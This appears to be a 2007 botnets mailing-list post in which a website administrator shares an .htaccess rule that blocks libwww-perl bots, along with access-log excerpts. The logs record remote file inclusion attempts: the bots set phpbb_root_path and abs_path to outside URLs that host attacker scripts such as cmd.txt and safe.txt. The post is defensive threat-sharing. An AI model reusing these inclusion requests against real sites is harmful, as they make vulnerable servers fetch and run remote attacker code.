[botnets] Possible use to someone here

Wed, 19 Sep 2007 19:00:46 -0700 

To report a botnet PRIVATELY please email: [EMAIL PROTECTED]
----------
Hi all;
I Don't know if this will help anyone track 
these I can't really make
too much sense of the log 

I implimented a .htaccess Rule to 301 redirect 
of libwww-perl etc to google.com

RewriteCond %{HTTP_USER_AGENT} ^libwww-perl.*$ [NC]
RewriteRule \.*$ http://www.google.com [R,L]

and so they came...

Here are some examples from the current access.log file

megan.netlogistics.com.au - - [08/Sep/2007:07:27:52 +1000] "GET
/index.php?
phpbb_root_path=http://www.kinkware.com/shop/pub/error.txt?? HTTP/1.1"
301 208 "-" "libwww-perl/5.808"

(this is the only one I contacted and they sent back an email from
[EMAIL PROTECTED]
contents of which is...
Hi,

We will investigate this issue. In the mean time can you please 
provide us your IP address so we can block all traffic to 
your address so that you are not affected by this.
Regards,

Tarinder Singh, Systems Administrator
Net Logistics Pty. Ltd.
http://www.netlogistics.com.au

)

193.138.206.192 - - [08/Sep/2007:07:30:20 +1000] "GET
/faq.php?phpbb_root_path=http://www.kinkware.com/shop/pub/error.txt??
HTTP/1.1" 301 208 "-" "libwww-perl/5.808"
...

b2.d7.344a.static.theplanet.com - - [10/Sep/2007:18:16:11 +1000] "GET
//phplivehelper/initiate.php?abs_path=http://usuarios.arnet.com.ar/lar
ry123/safe.txt? HTTP/1.1" 301 208 "-" "libwww-perl/5.808"
dime54.dizinc.com - - [10/Sep/2007:18:17:06 +1000] "GET
//phplivehelper/initiate.php?abs_path=http://usuarios.arnet.com.ar/lar
ry123/safe.txt? HTTP/1.1" 301 208 "-" "libwww-perl/5.808"
ik80.ikexpress.com - - [10/Sep/2007:18:18:17 +1000] "GET
//phplivehelper/initiate.php?abs_path=http://usuarios.arnet.com.ar/lar
ry123/safe.txt? HTTP/1.1" 301 208 "-" "libwww-perl/5.805"
mistral.lublin.pl - - [10/Sep/2007:18:33:15 +1000] "GET
//phplivehelper/initiate.php?abs_path=http://usuarios.arnet.com.ar/lar
ry123/safe.txt? HTTP/1.1" 301 208 "-" "libwww-perl/5.803"
...

p1w33.geo.scd.hostingprod.com - - [10/Sep/2007:20:08:57 +1000] "GET
/initiate.php?abs_path=http://ofskroz.somee.com/1337/perls/id.txt?
HTTP/1.1" 301 208 "-" "libwww-perl/5.803"
p1w33.geo.scd.hostingprod.com - - [10/Sep/2007:20:36:15 +1000] "GET
/m32forum/%3Cwbr%20/%3Eshowtopic.php?threadid=62&time=/initiate.ph
p?abs_path=http://ofskroz.somee.com/1337/perls/id.txt? HTTP/1.1" 301
208 "-" "libwww-perl/5.803"
...
vps.websitedepot.com - - [20/Sep/2007:06:51:05 +1000] "GET
/playlist.php?phpbb_root_path=http://www.tukangbecak.com/ban.gif?
HTTP/1.1" 301 208 "-" "libwww-perl/5.808"
...
megan.netlogistics.com.au - - [20/Sep/2007:07:09:49 +1000] "GET
/faq.php?phpbb_root_path=http://www.kinkware.com/shop/pub/error.txt??
HTTP/1.1" 301 208 "-" "libwww-perl/5.808"
business-media.info - - [20/Sep/2007:07:14:32 +1000] "GET
/faq.php?phpbb_root_path=http://sapikeren.net/yogya-carder/indonesia/T
hemes/nebula/temp? HTTP/1.1" 301 208 "-" "libwww-perl/5.69"
pass22.dizinc.com - - [20/Sep/2007:07:23:49 +1000] "GET
/playlist.php?phpbb_root_path=http://71.102.93.10/WTS/bin/hak/idpitbul
l.txt? HTTP/1.1" 301 208 "-" "libwww-perl/5.808"
ns7.xenserve.com - - [20/Sep/2007:07:30:18 +1000] "GET
/faq.php?phpbb_root_path=http://usuarios.arnet.com.ar/larry123/safe.tx
t? HTTP/1.1" 301 208 "-" "libwww-perl/5.805"
srv24.icx.pl - - [20/Sep/2007:07:41:28 +1000] "GET
/playlist.php?phpbb_root_path=http://usuarios.arnet.com.ar/larry123/sa
fe.txt? HTTP/1.1" 301 208 "-" "libwww-perl/5.808"
hostman.pl - - [20/Sep/2007:07:50:10 +1000] "GET
/index.php?phpbb_root_path=http://71.102.93.10/WTS/bin/hak/idpitbull.t
xt? HTTP/1.1" 301 208 "-" "libwww-perl/5.805"
srv24.icx.pl - - [20/Sep/2007:08:03:39 +1000] "GET
/index.php?phpbb_root_path=http://usuarios.arnet.com.ar/larry123/safe.
txt? HTTP/1.1" 301 208 "-" "libwww-perl/5.808"
202.60.80.10 - - [20/Sep/2007:08:19:27 +1000] "GET
/song.php?phpbb_root_path=http://www.kinkware.com/shop/pub/error.txt??
HTTP/1.1" 301 208 "-" "libwww-perl/5.808"
r118126.ppp.asahi-net.or.jp - - [20/Sep/2007:08:28:05 +1000] "GET
/faq.php?phpbb_root_path=http://www.yesevent.org/tmp/echo3? HTTP/1.1"
301 208 "-" "libwww-perl/5.79"
...
r118126.ppp.asahi-net.or.jp - - [20/Sep/2007:08:46:10 +1000] "GET
/song.php?phpbb_root_path=http://www.yesevent.org/tmp/echo3? HTTP/1.1"
301 208 "-" "libwww-perl/5.79"
hostman.pl - - [20/Sep/2007:08:48:32 +1000] "GET
/faq.php?phpbb_root_path=http://71.102.93.10/WTS/bin/hak/idpitbull.txt
? HTTP/1.1" 301 208 "-" "libwww-perl/5.805"
69.57.190.194 - - [20/Sep/2007:09:01:52 +1000] "GET
/index.php?phpbb_root_path=http://coyoteco.iespana.es/cmd.txt?
HTTP/1.1" 301 208 "-" "libwww-perl/5.79"
srv24.icx.pl - - [20/Sep/2007:09:12:33 +1000] "GET
/song.php?phpbb_root_path=http://usuarios.arnet.com.ar/larry123/safe.t
xt? HTTP/1.1" 301 208 "-" "libwww-perl/5.808"

-----------------------------------------------
Dave Arrowsmith http://www.4tfingers.biz/
   / _|_______
  / .\__   __/
 / /| |_| |
/___   __||
    |_| |_|
PO Box 111, Bogangar, NSW, 2488, Australia. 
Friends may come and go, but enemies accumulate.


_______________________________________________
To report a botnet PRIVATELY please email: [EMAIL PROTECTED]
All list and server information are public and available to law enforcement 
upon request.
http://www.whitestar.linuxbox.org/mailman/listinfo/botnets

Reply via email to